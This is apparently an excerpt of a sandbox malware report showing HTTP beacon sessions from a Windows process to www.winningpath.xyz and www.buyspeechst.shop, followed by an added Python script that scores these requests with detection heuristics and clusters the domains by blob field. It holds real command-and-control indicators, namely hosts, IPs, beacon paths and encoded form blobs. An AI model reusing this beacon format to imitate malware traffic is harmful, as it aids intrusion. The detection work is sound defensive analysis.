                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 68 5a 41 61 42 72 78 78 31 4b 46 50 4f 41 4f 46 46 67 44 51 6e 6b 4c 4a 6b 65 36 66 6f 57 4a 6c 6d 6c 6f 32 31 4b 37 70 30 77 59 32 42 48 46 34 38 64 38 2b 50 73 57 6f 74 59 76 45 2f 78 61 79 73 35 7a 55 2b 51 50 4a 56 4e 79 4c 37 4c 47 79 69 68 58 45 4d 35 56 56 37 36 2b 30 53 74 7a 6b 30 74 45 36 35 50 78 39 51 4b 71 4b 33 79 68 5a 62 70 52 4f 30 63 76 4f 38 4c 73 57 75 4f 75 70 37 66 58 4f 5a 39 62 4a 77 37 73 7a 44 77 46 64 6a 73 79 52 36 46 4c 6f 6d 36 73 6d 73 4c 64 48 53 4f 46 61 4f 49 7a 50 4e 71 4c 75 73 35 53 57 5a 4c 73 69 51 76 68 33 56 35 49 64 38 4e 2f 38 4a 71 33 6c 64 63 59 4e 70 59 36 34 41 47 4f 36 78 71 67 4e 51 52 2b 79 67 4e 4b 68 4c 74 2f 61 31 41 3d 3d
                                                                                                                    Data Ascii: nzs0T2=hZAaBrxx1KFPOAOFFgDQnkLJke6foWJlmlo21K7p0wY2BHF48d8+PsWotYvE/xays5zU+QPJVNyL7LGyihXEM5VV76+0Stzk0tE65Px9QKqK3yhZbpRO0cvO8LsWuOup7fXOZ9bJw7szDwFdjsyR6FLom6smsLdHSOFaOIzPNqLus5SWZLsiQvh3V5Id8N/8Jq3ldcYNpY64AGO6xqgNQR+ygNKhLt/a1A==
                                                                                                                    Jan 10, 2025 20:49:13.275042057 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:13 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    3 | 192.168.2.6 | 49989 | 209.74.79.41 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Jan 10, 2025 20:49:15.325737953 CET | 1882 | OUT | POST /4p8s/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.winningpath.xyz
                                                                                                                    Origin: http://www.winningpath.xyz
                                                                                                                    Referer: http://www.winningpath.xyz/4p8s/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1247
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 68 5a 41 61 42 72 78 78 31 4b 46 50 4f 41 4f 46 46 67 44 51 6e 6b 4c 4a 6b 65 36 66 6f 57 4a 6c 6d 6c 6f 32 31 4b 37 70 30 78 67 32 41 79 4a 34 75 75 6b 2b 4f 73 57 6f 75 59 76 46 2f 78 62 67 73 39 66 59 2b 51 44 5a 56 50 36 4c 37 75 53 79 7a 6a 7a 45 46 35 56 56 35 36 2b 78 57 74 7a 78 30 74 55 2b 35 50 68 39 51 4b 71 4b 33 78 4a 5a 5a 34 52 4f 32 63 76 4a 72 37 73 53 6a 75 75 4e 37 5a 2f 30 5a 39 76 5a 78 49 6b 7a 44 51 31 64 76 34 53 52 69 56 4c 71 6c 36 73 49 73 4c 52 49 53 50 70 38 4f 4a 58 78 4e 6f 58 75 70 73 44 33 4c 71 30 50 44 76 78 72 49 61 67 67 30 5a 72 4d 45 63 72 2b 64 4b 55 35 68 71 69 58 46 54 66 68 6e 71 38 4a 48 58 53 6e 6a 4d 4c 4e 50 75 75 6a 69 78 44 2b 70 76 4b 73 53 31 62 71 65 63 59 2b 62 36 41 41 79 62 65 45 53 2f 4c 76 46 68 6f 4e 37 50 56 66 49 69 43 45 50 5a 52 46 65 51 69 4a 55 64 55 4c 34 78 4a 6a 59 78 47 79 36 75 78 45 76 5a 63 59 61 63 74 6e 4d 53 46 74 2f 5a 6c 70 44 6c 4e 68 4f 59 43 64 5a 58 77 76 66 2b 6c 42 2b 68 6a 69 48 52 69 7a 61 7a 55 [TRUNCATED]
                                                                                                                    Data Ascii: nzs0T2=[TRUNCATED]
                                                                                                                    Jan 10, 2025 20:49:15.854110956 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:15 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    4 | 192.168.2.6 | 49990 | 209.74.79.41 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Jan 10, 2025 20:49:17.863284111 CET | 586 | OUT | GET /4p8s/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=sbo6CbF7xq9vaRi3YzuXiH7G7PCaul9K2GcB+IL1+35GAWVPgulqGeXZ6bn3jQiNs+qV6ADqYtqo2KT+0SDqdopb2qyXeoTz6pIh8vt4eZWlyhEkc4Yu1dj816xA9fmF7Yf8BYw= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.winningpath.xyz
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Jan 10, 2025 20:49:18.456195116 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:18 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    5 | 192.168.2.6 | 49991 | 104.21.112.1 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Jan 10, 2025 20:49:23.523698092 CET | 848 | OUT | POST /qzi3/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.buyspeechst.shop
                                                                                                                    Origin: http://www.buyspeechst.shop
                                                                                                                    Referer: http://www.buyspeechst.shop/qzi3/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 211
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 55 75 46 51 56 56 2f 79 7a 32 42 72 57 79 6f 77 39 55 6e 65 4b 65 2f 36 4e 36 49 45 51 5a 58 77 35 46 5a 75 4a 74 65 48 42 30 72 38 68 31 61 75 56 66 6a 44 75 51 71 74 52 38 30 56 69 31 47 37 46 4d 74 74 77 66 69 33 6b 50 47 56 57 74 4d 58 75 62 71 30 56 49 78 32 7a 4d 7a 30 51 30 50 43 67 63 4c 31 69 64 41 7a 48 6c 47 67 30 4a 33 51 39 6e 7a 54 4a 4b 31 4d 78 71 49 51 47 4c 74 5a 6f 6f 57 59 71 37 6e 36 6e 33 5a 33 6f 4e 46 58 37 57 32 57 79 65 74 6a 32 48 58 36 42 4c 78 66 49 30 6a 69 31 64 4c 6f 4f 65 6e 56 79 73 68 62 6f 52 57 6c 6d 2b 4b 6e 55 56 7a 6f 58 77 39 55 6a 71 46 70 57 74 4c 42 41 69 30 65
                                                                                                                    Data Ascii: nzs0T2=UuFQVV/yz2BrWyow9UneKe/6N6IEQZXw5FZuJteHB0r8h1auVfjDuQqtR80Vi1G7FMttwfi3kPGVWtMXubq0VIx2zMz0Q0PCgcL1idAzHlGg0J3Q9nzTJK1MxqIQGLtZooWYq7n6n3Z3oNFX7W2Wyetj2HX6BLxfI0ji1dLoOenVyshboRWlm+KnUVzoXw9UjqFpWtLBAi0e
                                                                                                                    Jan 10, 2025 20:49:24.120701075 CET | 1068 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:24 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yr537pJa80uD7vS8N5O%2BQqLW%2BhqzOMpDZF8PyFaPUKIXAj8eVc9eBAl6QZknnpRsyyr%2Bf8mhOFG6%2F82Hp1kHR9vArBt2kEw%2F4OjxRrWVDrXyCkb054B5s%2BgpqzFMhmLUerI4YN%2BOEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8fff30a87f1e0f5b-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=848&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: e3Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_+0


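                                                                                                                    The sessions above all follow one request shape from PID 2196: plaintext HTTP to port 80, a single short directory as the target (/4p8s/ on www.winningpath.xyz, /qzi3/ on www.buyspeechst.shop), one form field named nzs0T2 carrying an opaque base64-like blob, Origin and Referer headers that point back at the beacon URL itself, and an Android phone User-Agent emitted by a Windows process, with every server answering 404. The Python below is an added triage example, not part of the Joe Sandbox report: it parses the captured requests from sessions 2, 4 and 5 (embedded inline, Accept headers dropped) plus one constructed login POST to the hypothetical host intranet.example for contrast, scores each against rules that are assumptions drawn from this capture rather than a published FormBook specification, and clusters hosts by the blob field name. All function and class names are mine.

```python
"""Heuristic triage of the HTTP beacons captured above (added example, not part of
the Joe Sandbox report). Every scoring rule below is an ASSUMPTION drawn from these
sessions, not a documented FormBook protocol specification."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SHORT_DIR = re.compile(r"^/[a-z0-9]{4}/$")          # /4p8s/, /qzi3/
BLOB = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")    # base64 alphabet, not %-encoded
FIELD_NAME = re.compile(r"^[A-Za-z0-9]{3,8}$")      # nzs0T2, mLFl

UA_ANDROID = ("Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) "
              "AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36")

# Constructed input: requests from sessions 2, 4 and 5 above (Accept headers dropped)
# plus one ordinary login POST to a hypothetical intranet host for contrast.
SAMPLE_REQUESTS = {
    "session2": "POST /4p8s/ HTTP/1.1\r\nHost: www.winningpath.xyz\r\nOrigin: http://www.winningpath.xyz\r\n"
        "Referer: http://www.winningpath.xyz/4p8s/\r\nContent-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: 235\r\nUser-Agent: {UA_ANDROID}\r\n\r\n"
        "nzs0T2=hZAaBrxx1KFPOAOFFgDQnkLJke6foWJlmlo21K7p0wY2BHF48d8+PsWotYvE/xays5zU+QPJVNyL7LGyihXEM5VV76+0Stzk0tE65Px9"
        "QKqK3yhZbpRO0cvO8LsWuOup7fXOZ9bJw7szDwFdjsyR6FLom6smsLdHSOFaOIzPNqLus5SWZLsiQvh3V5Id8N/8Jq3ldcYNpY64AGO6xqgNQR+ygNKhLt/a1A==",
    "session4": "GET /4p8s/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=sbo6CbF7xq9vaRi3YzuXiH7G7PCaul9K2GcB+IL1+35GAWVPgulqGeXZ6bn3jQiNs"
        "+qV6ADqYtqo2KT+0SDqdopb2qyXeoTz6pIh8vt4eZWlyhEkc4Yu1dj816xA9fmF7Yf8BYw= HTTP/1.1\r\n"
        f"Host: www.winningpath.xyz\r\nConnection: close\r\nUser-Agent: {UA_ANDROID}\r\n\r\n",
    "session5": "POST /qzi3/ HTTP/1.1\r\nHost: www.buyspeechst.shop\r\nOrigin: http://www.buyspeechst.shop\r\n"
        "Referer: http://www.buyspeechst.shop/qzi3/\r\nContent-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: 211\r\nUser-Agent: {UA_ANDROID}\r\n\r\n"
        "nzs0T2=UuFQVV/yz2BrWyow9UneKe/6N6IEQZXw5FZuJteHB0r8h1auVfjDuQqtR80Vi1G7FMttwfi3kPGVWtMXubq0VIx2zMz0Q0PCgcL1idAz"
        "HlGg0J3Q9nzTJK1MxqIQGLtZooWYq7n6n3Z3oNFX7W2Wyetj2HX6BLxfI0ji1dLoOenVyshboRWlm+KnUVzoXw9UjqFpWtLBAi0e",
    "benign": "POST /login HTTP/1.1\r\nHost: intranet.example\r\nOrigin: http://intranet.example\r\n"
        "Referer: http://intranet.example/login.html\r\nContent-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: 39\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0\r\n\r\n"
        "user=alice&password=hunter2&csrf=abc123",
}


def parse_request(raw: str):
    """Split one raw HTTP/1.1 request into (method, target, headers, body); header names lower-cased."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def split_form(encoded: str) -> List[tuple]:
    """Split k=v&k=v WITHOUT decoding: urllib.parse.parse_qsl would turn '+' into a
    space and corrupt the base64 alphabet the BLOB rule tests for."""
    return [tuple(p.partition("=")[::2]) for p in encoded.split("&") if p]


@dataclass
class Verdict:
    session: str
    host: str
    path: str
    blob_field: Optional[str]
    reasons: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)


def analyze(session: str, raw: str, client_os: str = "windows") -> Verdict:
    method, target, headers, body = parse_request(raw)
    path, _, query = target.partition("?")
    host = headers.get("host", "")
    fields = split_form(body if method == "POST" else query)
    blobs = [k for k, val in fields if FIELD_NAME.match(k) and BLOB.match(val)]
    verdict = Verdict(session, host, path, blobs[0] if blobs else None)
    why = verdict.reasons.append
    if SHORT_DIR.match(path):
        why("target is a single short alphanumeric directory")
    if blobs:
        why(f"opaque base64-like blob in field {blobs[0]}")
    if method == "POST" and len(fields) == 1:
        why("POST carries exactly one form field")
    elif method == "GET" and len(fields) == 2 and len(blobs) == 1:
        why("GET carries one short key plus one blob key")
    if (headers.get("origin") == f"http://{host}"
            and headers.get("referer") == f"http://{host}{path}"):
        why("Origin/Referer point back at the beacon URL itself")
    if client_os == "windows" and "Android" in headers.get("user-agent", ""):
        why("Android browser User-Agent sent by a Windows process")
    return verdict


def cluster_by_field(verdicts) -> Dict[str, set]:
    """Group hosts by blob field name: the same nzs0T2 ties the rotating domains to one implant."""
    out: Dict[str, set] = {}
    for v in verdicts:
        if v.blob_field:
            out.setdefault(v.blob_field, set()).add(v.host)
    return out


def run_all() -> Dict[str, Verdict]:
    return {name: analyze(name, raw) for name, raw in SAMPLE_REQUESTS.items()}
```

                                                                                                                    Run as written, the two POST sessions score 5, the GET session scores 4 (no Origin/Referer on a GET) and the constructed login POST scores 0, while cluster_by_field() reports nzs0T2 against both www.winningpath.xyz and www.buyspeechst.shop, which is the pivot a responder would use to tie the two domains to the same PID. The form body is split by hand on purpose: a standard form decoder turns '+' into a space and would break the base64-alphabet check. The three-step body sizes (211, 235, 1247 bytes per domain in the capture) are visible here but deliberately not scored, since nothing on this page says they are fixed.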
                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    6 | 192.168.2.6 | 49993 | 104.21.112.1 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Jan 10, 2025 20:49:26.087872982 CET | 872 | OUT | POST /qzi3/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.buyspeechst.shop
                                                                                                                    Origin: http://www.buyspeechst.shop
                                                                                                                    Referer: http://www.buyspeechst.shop/qzi3/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 235
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 55 75 46 51 56 56 2f 79 7a 32 42 72 57 54 34 77 75 6e 50 65 64 4f 2f 35 43 61 49 45 61 35 58 30 35 46 46 75 4a 73 4b 58 42 43 37 38 6d 52 4b 75 48 75 6a 44 74 51 71 74 5a 63 30 51 73 56 47 4f 46 4d 68 6c 77 65 65 33 6b 50 43 56 57 74 63 58 75 73 65 33 55 59 78 34 38 73 7a 32 64 55 50 43 67 63 4c 31 69 64 55 4e 48 6c 65 67 30 35 48 51 2f 45 72 4d 4b 4b 31 50 32 71 49 51 43 4c 74 64 6f 6f 57 41 71 36 36 76 6e 78 64 33 6f 4a 42 58 37 48 32 56 34 65 74 68 72 58 58 6b 47 61 41 55 49 30 53 61 71 4f 72 4c 52 64 72 57 2b 36 38 42 30 69 57 47 30 75 71 6c 55 58 72 61 58 51 39 2b 68 71 39 70 45 36 48 6d 50 57 52 39 4c 4b 59 31 4d 31 39 74 6f 4b 4e 35 52 7a 4c 54 54 71 46 46 41 41 3d 3d
                                                                                                                    Data Ascii: nzs0T2=UuFQVV/yz2BrWT4wunPedO/5CaIEa5X05FFuJsKXBC78mRKuHujDtQqtZc0QsVGOFMhlwee3kPCVWtcXuse3UYx48sz2dUPCgcL1idUNHleg05HQ/ErMKK1P2qIQCLtdooWAq66vnxd3oJBX7H2V4ethrXXkGaAUI0SaqOrLRdrW+68B0iWG0uqlUXraXQ9+hq9pE6HmPWR9LKY1M19toKN5RzLTTqFFAA==
                                                                                                                    Jan 10, 2025 20:49:26.676137924 CET | 1071 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:26 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pzVcWSeeme6ttx0wfXPh57EmL0xkBVRfl8OFbe63aaWYakdL7xMSY7oF%2FNL15I2jzBiE0Ak%2FcJ380fSnsJRb%2FApe6D3Sj%2BZo8N6FicQpmQJ19vAJFO8xB0r3r9OL%2Bceu%2BRcNlk5zDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8fff30b87b550f5b-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1647&rtt_var=823&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=872&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
